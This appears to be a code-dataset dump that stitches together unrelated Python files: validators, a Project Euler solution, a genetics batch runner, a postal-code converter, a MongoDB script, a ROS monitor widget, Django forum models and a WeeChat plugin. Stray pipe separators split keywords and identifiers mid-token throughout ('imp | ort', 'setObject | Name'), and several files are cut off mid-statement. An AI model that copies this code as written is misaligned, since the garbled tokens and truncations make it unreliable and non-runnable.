        Bounds and value are converted to C{decimal.Decimal} before the
        range check is delegated to L{IsInRange}.
        @raise ValueError: If the value is no valid numeric or out of range.
        """
        self.__rangeCheck.minValue = _toDecimal(self.minValue)
        self.__rangeCheck.maxValue = _toDecimal(self.maxValue)
        self.__rangeCheck(_toDecimal(value))
def _toDecimal(value):
    """ Performs the conversion to C{decimal.Decimal}. """
    if isinstance(value, decimal.Decimal):
        # Already a Decimal: nothing to convert.
        return value
    try:
        return decimal.Decimal(str(value))
    except decimal.InvalidOperation:
        raise ValueError("The value '%s' is no valid numeric." % str(value))
class IsLengthInRange(object):
    """
    Validates that the length of a value falls inside a configured range.
    Works for any value supporting the builtin C{len} function.
    """
    def __init__(self, minLength=None, maxLength=None):
        """
        @param minLength: The lower bound, or C{None} for no bound.
        @type minLength: C{int}
        @param maxLength: The upper bound, or C{None} for no bound.
        @type maxLength: C{int}
        """
        self.minLength = minLength
        self.maxLength = maxLength
    def __call__(self, value):
        """
        Validates the length of the given value.
        @param value: The value whose length is checked.
        @type value: C{object}
        @raise ValueError: If the length is outside the configured range.
        """
        # Delegate the actual bound comparison to IsInRange.
        IsInRange(self.minLength, self.maxLength)(len(value))
class IsNumberOfDecimalPlacesInRange(object):
    """
    Checks whether the number of decimal places which was specified
    is in a specific range.
    """
    def __init__(self, minNumberOfDecimalPlaces=None, maxNumberOfDecimalPlaces=None):
        """
        @param minNumberOfDecimalPlaces: The lower bound.
        @type minNumberOfDecimalPlaces: C{int}
        @param maxNumberOfDecimalPlaces: The upper bound.
        @type maxNumberOfDecimalPlaces: C{int}
        """
        self.minNumberOfDecimalPlaces = minNumberOfDecimalPlaces
        self.maxNumberOfDecimalPlaces = maxNumberOfDecimalPlaces
        self.__inRangeValidator = IsInRange()
    def __call__(self, value):
        """
        Implements the validation.
        @param value: The value to check.
        @type value: L{Decimal<decimal.Decimal>}, C{float}, C{int}
        @raise ValueError: If the count of decimal places is out of range.
        """
        value = _toDecimal(value)
        # calculate specified number of decimal places
        tupleRepr = value.as_tuple() # represents as: (sign, given digits, exponent)
        if tupleRepr[2] >= 0: # positive or zero exponent
            # No fractional part at all.
            decimalPlaces = 0
        else:
            absolutExponent = abs(tupleRepr[2])
            possibleNumberOfDecimalPlaces = len(tupleRepr[1])
            if possibleNumberOfDecimalPlaces > absolutExponent:
                decimalPlaces = absolutExponent
            else:
                # Fewer given digits than the exponent magnitude (e.g.
                # 0.001 stores only digit (1,)): count the given digits.
                decimalPlaces = possibleNumberOfDecimalPlaces
        # check the calculated number of specified decimal places
        self.__inRangeValidator.minValue = self.minNumberOfDecimalPlaces
        self.__inRangeValidator.maxValue = self.maxNumberOfDecimalPlaces
        self.__inRangeValidator(decimalPlaces)
class AreOptionsMatched(object):
    """
    Validates that a value is one of a fixed set of options.
    Membership is tested with the comparison (equality) operator.
    """
    def __init__(self, options, optionsMandatory=True):
        """
        @param options: List of options that the checked value has to be taken from.
        @type options: C{list}
        @param optionsMandatory: Disables the check when set to C{False}.
        @type optionsMandatory: C{bool}
        """
        self.options = options
        self.optionsMandatory = optionsMandatory
    def __call__(self, value):
        """
        Validates the given value.
        @param value: Value to check.
        @raise ValueError: If the check is mandatory and the value is not an option.
        """
        if self.optionsMandatory and value not in self.options:
            raise ValueError("The item is not taken from the specified options.")
class AreTypesMatched(object):
"""
Checks whether the value is from one of the allowed types.
"""
def __init__(self, valueTypes, exactMatch=True):
"""
@param valueTypes: List of class object.
@type valueTypes: C{list} of class objects.
@param exactMat |
bayandin/Project-Euler | 20.py | Python | mit | 453 | 0 | #!/usr/b | in/env python
# -*- coding: utf-8 -*-
"""
n! means n × (n − 1) × ... × 3 × 2 × 1
For example, 10! = 10 × 9 × ... × 3 × 2 × 1 = 3628800,
and the sum of the digits in the number 10! is 3 + 6 + 2 + 8 + 8 + 0 + 0 = 27.
Find the sum of the digits in the number 100!
http://projecteuler.net/problem=20
"""
# Compute 100! by repeated multiplication (Python ints are arbitrary precision).
factorial = 1
for i in range(2, 101):
    factorial *= i
# Sum the decimal digits of the factorial.
result = 0
for i in str(factorial):
    result += int(i)
# print() works on both Python 2 and 3; the original bare print
# statement was a syntax error under Python 3.
print(result)
|
BrianTrethewey/negui | neLineRegress/SimBatchRun.py | Python | agpl-3.0 | 11,399 | 0.02123 | import ConfigParser
import os
import re
from itertools import product
import LineRegress
import ResultScraper
def _readValues(config, section, delimiters, cast):
    """Return the parsed "values" list of *section*, or None when absent.

    Splits the option on any configured delimiter and casts every
    element with *cast* (int or float).
    BUG FIX: the original called re.split(delimiters.paramTemp), which
    raised AttributeError -- pattern and string are separate arguments.
    """
    if config.has_section(section) and config.has_option(section, "values"):
        paramTemp = config.get(section, "values")
        paramList = re.split(delimiters, paramTemp)
        return [cast(value) for value in paramList]
    return None
def readconfig(filename):
    """Parse the batch-run configuration file *filename*.

    @param filename: path of an INI-style configuration file.
    @return: dictionary with one entry per simulation parameter; every
        numeric parameter is a list of values (even when only one value
        is configured) so callers can iterate over combinations.
    """
    # Python 3 renamed the module; support both interpreters.
    try:
        import configparser as configparser_module
    except ImportError:
        import ConfigParser as configparser_module
    ## SET DEFAULTS -- all numeric defaults are lists, even single values.
    speciesFile = ""
    outFolder = ""
    lineRegressConfig = ""
    lambdas = [1.0]
    startPopulations = []  # TODO need default
    N0s = []  # TODO need default
    microsats = []  # TODO need default
    alleleCount = []  # TODO needs default
    SNPs = []  # TODO need default
    mutationRate = [0]
    lociSampling = [1.0]
    populationSampling = [1.0]
    simReps = [100]
    ## SET FILE DELIMITERS (comma, pipe, newline or semicolon)
    delimiters = ',|\||\n|;'
    # Open and parse the configuration file (close the handle: the
    # original leaked it).
    config = configparser_module.ConfigParser()
    configFile = open(filename)
    try:
        if hasattr(config, 'read_file'):
            config.read_file(configFile)  # Python 3
        else:
            config.readfp(configFile)  # Python 2
    finally:
        configFile.close()
    # String-valued sections (option "name").
    if config.has_section("outFolder"):
        if config.has_option("outFolder", "name"):
            outFolder = config.get("outFolder", "name")
    if config.has_section("species"):
        if config.has_option("species", "name"):
            speciesFile = config.get("species", "name")
    if config.has_section("lineRegress"):
        if config.has_option("lineRegress", "name"):
            lineRegressConfig = config.get("lineRegress", "name")
    # Result dictionary pre-filled with the defaults.
    paramDict = {"species": speciesFile,
                 "outputFolder": outFolder,
                 "regressConfig": lineRegressConfig,
                 "lambdas": lambdas,
                 "startPops": startPopulations,
                 "N0": N0s,
                 "microsats": microsats,
                 "alleleCount": alleleCount,
                 "SNPs": SNPs,
                 "mutationRate": mutationRate,
                 "lociSampling": lociSampling,
                 "popSampling": populationSampling,
                 "simReps": simReps}
    # Numeric list sections: (section name, cast, result key).
    # "startNewborns" and "N0" are synonyms and fill the same entry.
    # BUG FIX: the sampling rates are fractions (defaults 1.0) and are
    # now parsed as float -- int("0.5") raised ValueError.
    numericSections = [
        ("lambda", float, "lambdas"),
        ("startPop", int, "startPops"),
        ("startNewborns", int, "N0"),
        ("N0", int, "N0"),
        ("Microsats", int, "microsats"),
        ("alleleCount", int, "alleleCount"),
        ("SNPs", int, "SNPs"),
        ("mutationRate", float, "mutationRate"),
        ("lociSampleRate", float, "lociSampling"),
        ("individualSamplRate", float, "popSampling"),
        ("simReps", int, "simReps"),
    ]
    for section, cast, key in numericSections:
        values = _readValues(config, section, delimiters, cast)
        if values is not None:
            paramDict[key] = values
    return paramDict
def runSimulation(species, outFolder, simReps, lambdaVal, startPop, N0, microSats, alleleCount, SNPs, mutationRate):
    """Placeholder for the simuPOP stage.

    Intended to create a folder for the simuPOP run and execute it; the
    implementation is still missing, so an empty file list is returned.
    """
    # TODO: create the simuPOP run folder and launch the simulation.
    outputFiles = list()
    return outputFiles
def runNeEst(files, runFolder, locisampling, popsampling, regressConfig):
    """Run the NeEstimator / line-regression stage for one parameter set.

    @param files: simulation output files to sample from.
    @param runFolder: output folder of this run.
    @param locisampling: loci sampling rate.
    @param popsampling: individual sampling rate.
    @param regressConfig: path of the line-regression configuration.
    @return: (neFile, statsFile) tuple.  BUG FIX: the original returned
        only statsFile, so both callers (run and runSamplingOnly), which
        unpack two values, raised at runtime.
    """
    statsFile = ""
    # TODO: create output folder
    # TODO: run neEstimator
    neFile = ""
    # Run the line regression with the configured thresholds.
    configVals = LineRegress.neConfigRead(regressConfig)
    statsFile = LineRegress._neStatsHelper(neFile, configVals["alpha"],
                                           outFileName=statsFile,
                                           significantValue=configVals["sigSlope"],
                                           firstVal=configVals["startData"])
    return neFile, statsFile
def gatherNe(fileName, firstVal):
    """Collect the Ne estimates scraped from *fileName* (second scrape value discarded)."""
    scraped, _unused = ResultScraper.scrapeNE(fileName, firstVal)
    return scraped
def gatherPower(filename):
    """Collect the power analysis results scraped from *filename*."""
    return ResultScraper.scrapePower(filename)
def gatherSlopes(filename):
    """Collect the per-instance slope records scraped from *filename*."""
    instances, _byGroup = ResultScraper.scrapeSlopes(filename)
    return instances
def createIdentifier(species, outFolder, simReps, lambdaVal, startPop, N0, microSats, alleleCount, SNPs, mutationRate, locisampling, popsampling, regressConfig):
    """Build the canonical identifier string for one parameter combination.

    BUG FIX: in the original the assignment statement ended after
    "l"+str(lambdaVal); the following "+..." lines formed a second
    statement starting with a unary plus on a string (TypeError at
    runtime) and nothing was ever returned.  All fragments now form one
    expression and the identifier is returned.
    """
    identifier = ("l" + str(lambdaVal)
                  + "p" + str(startPop)
                  + "N0" + str(N0)
                  + "m" + str(microSats)
                  + "ac" + str(alleleCount)
                  + "SNPs" + str(SNPs)
                  + "mr" + str(mutationRate)
                  + "ls" + str(locisampling)
                  + "ps" + str(popsampling))
    return identifier
def parseIdentifier(identifier):
    """Parse an identifier produced by createIdentifier back into its parts.

    BUG FIX: the original compiled the pattern without matching or
    returning anything, and its startPop class "[\\d*]" matched at most
    one character.
    @return: dict with keys lambda, startPop, N0, microsats,
        allelecount, SNPs, mutations, locisampling and popsampling (all
        string-valued), or None when *identifier* does not match.
    """
    pattern = re.compile(
        r'l(?P<lambda>[\d\.]*)'
        r'p(?P<startPop>\d*)'
        r'N0(?P<N0>\d*)'
        r'm(?P<microsats>\d*)'
        r'ac(?P<allelecount>\d*)'
        r'SNPs(?P<SNPs>\d*)'
        r'mr(?P<mutations>[\d\.]*)'
        r'ls(?P<locisampling>[\d\.]*)'
        r'ps(?P<popsampling>[\d\.]*)')
    match = pattern.match(identifier)
    if match is None:
        return None
    return match.groupdict()
def nameRunFolder(species, outFolder, simReps, lambdaVal, startPop, N0, microSats, alleleCount, SNPs, mutationRate, locisampling, popsampling, regressConfig):
    """Derive the output folder path for one parameter combination.

    @return: identifier joined under *outFolder*, or None when the
        folder already exists (so the combination is not re-run).
    """
    runFolder = createIdentifier(species, outFolder, simReps, lambdaVal, startPop, N0, microSats, alleleCount, SNPs, mutationRate, locisampling, popsampling, regressConfig)
    print(runFolder)
    # BUG FIX: os.sys.join does not exist (os.sys is the sys module);
    # path components are joined with os.path.join.
    runFolder = os.path.join(outFolder, runFolder)
    if os.path.isdir(runFolder):
        return None
    return runFolder
def run(species, outFolder, simReps, lambdaVal, startPop, N0, microSats, alleleCount, SNPs, mutationRate, locisampling, popsampling, regressConfig):
    """Execute one full pipeline pass (simulation + Ne estimation).

    Returns None when the run folder already exists, otherwise the
    (neFile, statsFile) pair of the estimation stage.
    """
    targetFolder = nameRunFolder(species, outFolder, simReps, lambdaVal, startPop, N0, microSats, alleleCount, SNPs, mutationRate, locisampling, popsampling, regressConfig)
    if not targetFolder:
        # Folder already present: this combination was run before.
        return
    os.makedirs(targetFolder)
    simFiles = runSimulation(species, targetFolder, simReps, lambdaVal, startPop, N0, microSats, alleleCount, SNPs, mutationRate)
    neFile, statsFile = runNeEst(simFiles, targetFolder, locisampling, popsampling, regressConfig)
    return neFile, statsFile
def runSamplingOnly(files, runFolder, locisampling, popsampling, regressConfig):
    """Re-run only the sampling/estimation stage on existing simulation files."""
    results = runNeEst(files, runFolder, locisampling, popsampling, regressConfig)
    neFile, statsFile = results
    return neFile, statsFile
def collectStatsData(neDict, statsDict, outFolder,firstVal):
slopesName = "slopes.csv"
powerName = "power.csv"
neName = "Ne.csv"
nePath = |
morinatsu/ZipCode | bin/make_loaddata.py | Python | mit | 2,655 | 0.001889 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
make_loaddata.py
Convert ken_all.csv to loaddata
"""
import argparse
import csv
def merge_separated_line(args):
    """
    Yield one CSV row at a time from args.source (ken_all.csv).
    Consecutive rows that share the same postal code (and whose address
    text was split across records) are merged into a single row before
    being yielded.
    """
    def is_dup(line, buff):
        """ Decide whether *line* continues the buffered row *buff*. """
        # same postalcode
        if line[2] != buff[2]:
            return False
        # include choume and not
        if line[11] != buff[11]:
            return False
        # line contains touten (kana address field)
        if line[5].count(u'、') != 0:
            return True
        if buff[5].count(u'、') != 0:
            return True
        # line contains touten (kanji address field)
        if line[8].count(u'、') != 0:
            return True
        if buff[8].count(u'、') != 0:
            return True
        return False
    def merge(line, buff):
        """ Merge the address fields of two continuation rows. """
        new_buff = []
        idx = 0
        for element in line:
            # Append the continuation text unless the field already
            # starts with the buffered prefix (i.e. it is unchanged).
            if element[:len(buff[idx])] != buff[idx]:
                new_buff.append(u''.join([buff[idx], element]))
            else:
                new_buff.append(buff[idx])
            idx += 1
        return new_buff
    line_buffer = []
    ken_all = csv.reader(open(args.source))
    for line in ken_all:
        # Python 2 code: decode every field from UTF-8 bytes.
        unicode_line = [unicode(s, 'utf8') for s in line]
        if not(line_buffer):
            line_buffer = unicode_line
            continue
        if is_dup(unicode_line, line_buffer):
            line_buffer = merge(unicode_line, line_buffer)
        else:
            yield line_buffer
            line_buffer = unicode_line
    # Flush the last buffered row.
    yield line_buffer
def parse_args():
    """Parse the command line: the source CSV plus the two output data files."""
    arg_parser = argparse.ArgumentParser(
        description='Make loaddata of postalcode.')
    for name, description in (('source', 'input file of converting'),
                              ('area', 'data file for area-code'),
                              ('net', 'data file of net-code')):
        arg_parser.add_argument(name, help=description)
    return arg_parser.parse_args()
def main(args):
    """Split the merged postal-code rows into area-code and net-code files."""
    area_writer = csv.writer(open(args.area, 'w'),
                             delimiter=',',
                             quoting=csv.QUOTE_NONE)
    net_writer = csv.writer(open(args.net, 'w'),
                            delimiter=',',
                            quoting=csv.QUOTE_NONE)
    for row in merge_separated_line(args):
        encoded = [s.encode('utf8') for s in row]
        # Postal codes ending in "00" denote net (whole-area) codes.
        if row[2][5:7] != '00':
            area_writer.writerow(encoded)
        else:
            net_writer.writerow(encoded)
if __name__ == '__main__':
    # Script entry point: parse the command line and run the conversion.
    args = parse_args()
    main(args)
|
ramaganapathy1/AMuDA-Ir-back-end | production/JVcode/Scripts/ForClassification/ela-sep.py | Python | mit | 2,166 | 0.017544 | import sys
from pymongo import MongoClient
from werkzeug.utils import secure_filename
import os
imp | ort sys
# Connect to the local MongoDB instance holding the paper metadata.
client = MongoClient('mongodb://localhost:27017/')
db = client.ir
#li=[]
#color=open("AllColors.txt","r")
doc1=[]
doc2=[]
edgeConWT=[]
edgeElaWT=[]
edgeStart=[]
edgeEnd=[]
path="JVcode/Scripts/ForClassification/"
# For every *.tab.scores file: read the edge list, sort it by
# elaboration weight (descending) and store the top-5 target papers as
# the "elaboration" list of the matching rPaper document.
for file in os.listdir(path):
    edgeElaWT = []
    edgeConWT = []
    edgeStart = []
    edgeEnd = []
    print (file)
    if file.endswith(".tab.scores"):
        fdTemp=open(path+file,"r")
        #fdOut=open("output/new/elab-"+file,"w+")
        # Each line: start end connection-weight elaboration-weight
        # (negative elaboration weights are clamped to 0.0).
        for i1 in fdTemp:
            line=i1.split(" ")
            #print line
            edgeStart.append(line[0])
            edgeEnd.append(line[1])
            edgeConWT.append(float(line[2]))
            if(float(line[3]))>0:
                edgeElaWT.append(float(line[3]))
            else:
                edgeElaWT.append(0.0)
        # Bubble sort: order edges by elaboration weight, descending,
        # keeping edgeStart/edgeEnd aligned with edgeElaWT.
        for i in range(0,len(edgeElaWT)):
            for j in range(0, len(edgeElaWT)):
                if (j < (len(edgeConWT) - 1)):
                    if (edgeElaWT[j] < edgeElaWT[j + 1]):
                        temp = edgeElaWT[j]
                        edgeElaWT[j] = edgeElaWT[j + 1]
                        edgeElaWT[j + 1] = temp
                        temp2 = edgeStart[j]
                        edgeStart[j] = edgeStart[j + 1]
                        edgeStart[j + 1] = temp2
                        temp3 = edgeEnd[j]
                        edgeEnd[j] = edgeEnd[j + 1]
                        edgeEnd[j + 1] = temp3
        #print (edgeEnd,edgeElaWT)
        # Look up the five highest-weighted target papers.
        # NOTE(review): assumes every scores file has >= 5 edges and
        # that each target exists in db.papers -- confirm.
        t2 = []
        for k in range(0,5):
            results = db.papers.find_one({'filename': edgeEnd[k][:-3] + 'pdf'})
            print results
            h={}
            h['name'] = results['_id']
            h['domain']=results['domain']
            t2.append(h)
        print ("To update : ",t2)
        print("for => ",file)
        str1="db.rPaper.update({'filename':"+ file[:-10]+"'pdf'}, {'$set': {'elaboration':}})"
        print(str1)
        results = db.rPaper.update({'filename': file[:-10]+'pdf'}, {'$set': {'elaboration': t2}})
        print (results)
print "DONE"
aslab/rct | higgs/branches/ros-groovy/higgs_gazebo_simulation/rqt_robot_plugins/rqt_robot_monitor/src/rqt_robot_monitor/robot_monitor.py | Python | gpl-3.0 | 24,412 | 0.000942 | # Software License Agreement (BSD License)
#
# Copyright (c) 2012, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: Isaac Saito, Ze'ev Klapow
import os
import rospkg
from diagnostic_msgs.msg import DiagnosticArray, DiagnosticStatus
from python_qt_binding import loadUi
from python_qt_binding.QtCore import QTimer, Signal
from python_qt_binding.QtGui import QColor
import rospy
from .abst_status_widget import AbstractStatusWidget
from .chronologic_state import InstantaneousState, StatusItem
from .time_pane import TimelinePane
from .util_robot_monitor import Util
class RobotMonitorWidget(AbstractStatusWidget):
"""
NOTE: RobotMonitorWidget.shutdown function needs to be called
when the instance of this class terminates.
RobotMonitorWidget itself doesn't store previous diagnostic states.
It instead delegates that function to TimelinePane class.
"""
_sig_tree_nodes_updated = Signal(int)
_sig_new_diagnostic = Signal(DiagnosticArray)
_TREE_ALL = 1
_TREE_WARN = 2
_TREE_ERR = 3
def __init__(self, context, topic):
"""
:param context: plugin context hook to enable adding widgets as a
ROS_GUI pane, 'PluginContext'
:param topic: Diagnostic topic to subscribe to 'str'
"""
super(RobotMonitorWidget, self).__init__()
rp = rospkg.RosPack()
ui_file = os.path.join(rp.get_path('rqt | _robot_monitor'), 'resource',
'robotmonitor_mainwidget.ui')
loadUi(ui_file, self, {'TimelinePane': TimelinePane})
#loadUi(ui_file, self)
obj_name = 'Robot Monitor'
self.setObject | Name(obj_name)
self.setWindowTitle(obj_name)
self._toplevel_statitems = [] # StatusItem
self._warn_statusitems = [] # StatusItem. Contains ALL DEGREES
# (device top level, device' _sub) in parallel
self._err_statusitems = [] # StatusItem
self.tree_all_devices.itemDoubleClicked.connect(self._tree_clicked)
self.warn_flattree.itemDoubleClicked.connect(self._tree_clicked)
self.err_flattree.itemDoubleClicked.connect(self._tree_clicked)
self.tree_all_devices.resizeColumnToContents(0)
self._sig_tree_nodes_updated.connect(self._tree_nodes_updated)
# TODO: Declaring timeline pane.
# Needs to be stashed away into .ui file but so far failed.
self.timeline_pane.set_timeline_data(Util.SECONDS_TIMELINE,
self.get_color_for_value,
self.on_pause)
self.vlayout_top.addWidget(self.timeline_pane)
self.timeline_pane.show()
self._paused = False
self._is_stale = False
self._last_message_time = 0.0
self._timer = QTimer()
# self._timer.timerEvent.connect(self._update_message_state)
self._timer.timeout.connect(self._update_message_state)
self._timer.start(1000)
self._sub = rospy.Subscriber(
topic, # name of the topic
DiagnosticArray, # type of the topic
self._cb)
self._sig_new_diagnostic.connect(self.new_diagnostic)
    def _cb(self, msg):
        """ROS subscriber callback for the diagnostics topic.

        Intended to be called from non-Qt thread,
        ie. ROS Subscriber in particular. It only re-emits the message as a
        Qt signal so the actual GUI update happens on the Qt main thread.

        :type msg: DiagnosticArray
        """
        # Directly calling callback function 'new_diagnostic' here results in
        # segfaults.
        self._sig_new_diagnostic.emit(msg)
    def new_diagnostic(self, msg, is_forced=False):
        """
        Overridden from AbstractStatusWidget.

        When monitoring not paused, this public method updates all the
        treewidgets contained in this class, and also notifies the StatusItem
        instances that are stored in the all-device-tree, which eventually
        updates the InspectorWindows in them.

        :type msg: DiagnosticArray
        :param is_forced: Intended for non-incoming-msg trigger
                          (in particular, from child object like TimelinePane).
        @author: Isaac Saito
        """
        # Normal path: record in the timeline, rebuild every tree, refresh
        # stale-detection state, and propagate to open inspector windows.
        if not self._paused and not is_forced:
            self.timeline_pane.new_diagnostic(msg)
            self._update_devices_tree(msg)
            self._update_warns_errors(msg)
            self._on_new_message_received(msg)
            self._notify_statitems(msg)
            rospy.logdebug(' RobotMonitorWidget _cb stamp=%s',
                           msg.header.stamp)
        # Forced refresh (e.g. replay from TimelinePane): only rebuild the
        # trees; the timeline and staleness state are left untouched.
        elif is_forced:
            self._update_devices_tree(msg)
            self._update_warns_errors(msg)
def _notify_statitems(self, diag_arr):
"""
Notify new message arrival to all existing InespectorWindow instances
that are encapsulated in StatusItem instances contained in
self._toplevel_statitems.
"""
for statitem_new in diag_arr.status:
corresp = Util.get_correspondent(statitem_new.name,
self._toplevel_statitems)
statitem_prev = corresp[Util._DICTKEY_STATITEM]
if statitem_prev and statitem_prev.inspector:
rospy.logdebug(' RobotMonitorWidget _notify_statitems ' +
'name=%s len toplv items=%d',
statitem_new.name, len(self._toplevel_statitems))
return
    def resizeEvent(self, evt):
        """Overridden from QWidget.

        Redraws the timeline pane so it matches the widget's new geometry.
        """
        rospy.logdebug('RobotMonitorWidget resizeEvent')
        self.timeline_pane.redraw()
    def _tree_clicked(self, item, column):
        """
        Slot to QTreeWidget.itemDoubleClicked; delegates handling of the
        double-click to the clicked StatusItem itself.

        :type item: QTreeWidgetItem
        :type column: int
        """
        rospy.logdebug('RobotMonitorWidget _tree_clicked col=%d', column)
        item.on_click()
def _update_devices_tree(self, diag_array):
"""
Update the tree from the bottom
:type diag_array: DiagnosticArray
"""
# TODO: 11/5/2012 Currently, in case some devices disappear
# while running this program, there's no way to remove
# those from the device-tree.
statusnames_curr_toplevel = [Util.get_grn_resource_name(status.name)
for status in self._toplevel_statitems]
# Only the status variable that pops up at the end is
# processed by Util.get_grn_resource_name.
for status_new in self._get_toplevel_diagnosticstat(diag_array):
name = Util.get_grn_resource_name(status_new.name)
rosp |
laxmikantG/mypublisher | mypublisher/urls.py | Python | mit | 629 | 0.012719 | from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(r'^admin/', include(admin.site.urls)),
# (r'^statinfo/$', 'appname.views.stat_info'),
(r'^login/$', 'django.contrib.auth.views.login'),
(r'^logout/$', 'django.contrib.auth.views.logout', {'next_page' : '/login'}),
(r'^menu/$', 'mypublisher.views.mainm | enu'),
(r'^cmanager/$', 'mypublisher.views.content_manager'),
(r'^cmanager/upload$', 'mypub | lisher.views.render_upload_content'),
(r'^cmanager/upload/save$', 'mypublisher.views.save_content'),
) |
anhstudios/swganh | data/scripts/templates/object/tangible/component/dna/shared_dna_template_brackaset.py | Python | mit | 485 | 0.045361 | #### NOTICE: THI | S FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/component/dna/shared_dna_template_brackaset.iff"
result.attribute_template_id = -1
result.stfName("craft_dna_components_n","dna_template_brackaset")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return | result |
mwgg/WeeChat-DeaDBeeF-np | deadbeef_np.py | Python | mit | 524 | 0.009542 | import commands
import weechat
def weechat_np(data, buffer, args):
read_track = commands.getoutput('deadbeef --nowplaying "%a - (%b) - %t [%@:BPS@bit / %@:BITRATE@kbps / %@: | SAMPLERATE | @Hz]"').split('\n')
weechat.command(buffer, '/me is currently listening to: ' + read_track[1])
return weechat.WEECHAT_RC_OK
weechat.register("deadbeef_np", "mwgg", "0.9", "MIT", "Show name of the song currently played by DeaDBeeF", "", "")
weechat.hook_command("np", "Get/send now playing info.", "", "", "", "weechat_np", "")
|
ashbc/tgrsite | forum/models.py | Python | isc | 5,132 | 0.001559 | from django.db import models
from django.shortcuts import reverse
from users.models import Member
body_size = 32768
class Forum(models.Model):
parent = models.ForeignKey(
'self',
on_delete=models.CASCADE,
blank=True, null=True,
related_name='subforums')
sort_index = models.IntegerField(default=0,
help_text='Index for sorting. Lower value = earlier in list.')
title = models.CharField(max_length=64, verbose_name="Name")
description = models.CharField(max_length=256, blank=True)
def __str__(self):
return self.title
def get_parents(self):
if self.parent is None:
return []
tree = []
seen = {}
# walk up through tree to root
x = self.parent
while True:
tree.append(x)
seen[x.pk] = True
if x.parent is not None and x.parent.pk not in seen:
# traverse upwards
x = x.parent
else:
# reached root or loop parent
break
return reversed(tree)
# string that represents the forum's location
# eg "Roleplaying / LARP / Character Sheets"
# might be useful to generalise this for Threads
def get_parent_tree(self):
tree = [str(x) for x in self.get_parents()]
if not tree:
return '-'
return ' / '.join(tree)
get_parent_tree.short_description = 'Location'
# QuerySet of subforums
def get_subforums(self):
return Forum.objects.filter(parent=self.id)
# list of string representations of subforums
def get_subforums_str(self):
return [str(x) for x in self.get_subforums()]
get_subforums.short_description = 'Subforums'
get_subforums_str.short_description = 'Subforums'
@staticmethod
def get_parentless_forums():
return Forum.objects.filter(parent__isnull=True)
def get_threads_count(self):
return Thread.objects.filter(forum=self.id).count()
get_threads_count.short_description = 'threads'
# recursively get thread count
# i.e. number of threads here and in all subforums
def get_threads_count_r(self, seen=None):
if seen is None:
seen = {self.pk:True}
count = 0
for subforum in self.get_subforums():
if not subforum.pk in seen:
seen[subforum.pk] = True
count += subforum.get_threads_count_r(seen)
return count + self.get_threads_count()
def get_la | test_post(self):
return self. | thread_set.latest('pub_date')
def get_absolute_url(self):
return reverse("forum:subforum", args=(self.pk,))
# return self.thread_set.order_by('pub_date').reverse()[:1][::-1]
class Thread(models.Model):
    """A forum thread: the opening post plus its metadata.

    Replies are stored in :class:`Response`; this model holds only the OP.
    """
    # cascade because we need to be able to delete forums maybe?
    # in which case forumless threads will either die,
    # or need to be moved -before- the forum is deleted
    forum = models.ForeignKey(Forum, on_delete=models.CASCADE)
    title = models.CharField(max_length=64)
    body = models.TextField(max_length=body_size)
    pub_date = models.DateTimeField('date posted')
    # pinned/stickied/whatever threads will show up before all others in their forums
    is_pinned = models.BooleanField(default=False)
    # prevents people not admin from replying to a thread
    is_locked = models.BooleanField(default=False)
    # until we implement proper banning/deactivation, just cascade
    author = models.ForeignKey(Member, on_delete=models.CASCADE)
    # people subscribed to updates
    subscribed = models.ManyToManyField(Member, related_name="thread_notification_subscriptions")
    def __str__(self):
        return self.title
    def get_author(self):
        """Username of the thread's author."""
        # self.author already resolves the ForeignKey to a Member; the old
        # Member.objects.get(id=self.author.id) issued a redundant DB query.
        return self.author.equiv_user.username
    get_author.short_description = 'Author'
    def get_response_count(self):
        """Number of replies to this thread."""
        return Response.objects.filter(thread=self.id).count()
    def get_all_authors(self):
        """Distinct Members who posted in this thread (OP included)."""
        authors = [x.author for x in self.response_set.all()]
        authors.append(self.author)
        return list(set(authors))
    def get_absolute_url(self):
        return reverse("forum:viewthread", args=(self.id,))
# a reply in a forum thread
# there are fundamental similarities between thread OPs and responses;
# but the decision was made early to put the latter as part of the Thread class...
class Response(models.Model):
    """A reply in a forum thread."""
    # when a thread is deleted its responses are deleted
    thread = models.ForeignKey(Thread, on_delete=models.CASCADE)
    body = models.TextField(max_length=body_size)
    pub_date = models.DateTimeField('date posted', auto_now_add=True)
    author = models.ForeignKey(Member, on_delete=models.CASCADE)
    def __str__(self):
        # TODO: probably strip markdown
        return self.body
    def get_author(self):
        """The Member who wrote this response."""
        # The ForeignKey already resolves to the Member instance; the old
        # Member.objects.get(id=self.author.id) was a redundant DB query.
        return self.author
    get_author.short_description = 'Author'
    def get_absolute_url(self):
        return reverse("forum:viewthread", args=(self.thread_id,)) + "#response-" + str(self.pk)
|
